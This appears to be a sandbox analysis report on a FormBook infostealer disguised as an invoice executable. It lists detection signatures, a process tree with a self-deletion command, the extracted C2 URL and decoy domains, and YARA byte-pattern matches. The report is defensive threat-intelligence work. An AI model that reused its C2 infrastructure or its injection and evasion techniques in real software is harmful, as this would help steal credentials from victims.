Edit tour

Windows Analysis Report
HIRE SOA FOR DEC_2021.exe

Overview

General Information

Sample Name:	HIRE SOA FOR DEC_2021.exe
Analysis ID:	562107
MD5:	d8af2363d5a46336733b6121c0b4cf0e
SHA1:	fcb0ee44436230d924b2550fc9935ee76f2498fe
SHA256:	2a4415721925c12ce8a80719697ffbda5daf88fe34804b0549bc5d5605790cdb
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Self deletion via cmd delete

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses ipconfig to lookup or modify the Windows network settings

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

HIRE SOA FOR DEC_2021.exe (PID: 7124 cmdline: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" MD5: D8AF2363D5A46336733B6121C0B4CF0E)

HIRE SOA FOR DEC_2021.exe (PID: 4744 cmdline: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" MD5: D8AF2363D5A46336733B6121C0B4CF0E)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

ipconfig.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 5744 cmdline: /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.littlesportsacademy.com/cxep/"], "decoy": ["estateglobal.info", "loransstore.com", "loginofy.com", "fjallravenz.online", "cefseguranca-app.com", "safontadiestramiento.com", "bubbleteapro.com", "morethanmummies.com", "serviciopersonalizadoweb.com", "headerbidder.info", "skworkforce.com", "heightsorthodontics.com", "chulavistapd.com", "southjerseyautobody.net", "chargedbygratitude.com", "meltingpotspot.com", "gdjiachen.com", "luckdrawprogram.com", "vintagepaseo.com", "bequestslojyh.xyz", "layeredrofbes.xyz", "com-weekly.email", "suddisaddu.com", "jnlord.com", "outerverse.ventures", "terraroyale.com", "hairclub.info", "rent2owninusa.com", "pmaonline.xyz", "wearecampo.com", "multiplezonesplit.com", "angry-mandala.com", "ikigaiofficial.store", "princewoodwork.store", "moviesaver24.com", "btec-solutions.com", "valurgrayenterprises.com", "homesofsilverspur.com", "leysy-y-nazareno.com", "grade8.tech", "ammarus.com", "researchjournal.net", "nicolaslacasse.com", "khukhuantainha.com", "resultlv.com", "toraportal.com", "wickedhunterworld.com", "clickspromolp.com", "b148tlrnd09ustnnaku2721.com", "high-low-ga.info", "norcalfirewoodllc.com", "fatima2021.com", "aaronsmathquest.com", "decal-mania.com", "spitfiredefenceindustries.com", "mireyita.com", "simonhaidomous.com", "roofingcontractorhickory.com", "mgav69.xyz", "spacebymeghan.com", "hot144.com", "mmfirewood.net", "akshayaasri.com", "bilgisayarimnekadar.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ae9:$sqlite3step: 68 34 1C 7B E1 0x6bfc:$sqlite3step: 68 34 1C 7B E1 0x6b18:$sqlite3text: 68 38 2A 90 C5 0x6c3d:$sqlite3text: 68 38 2A 90 C5 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
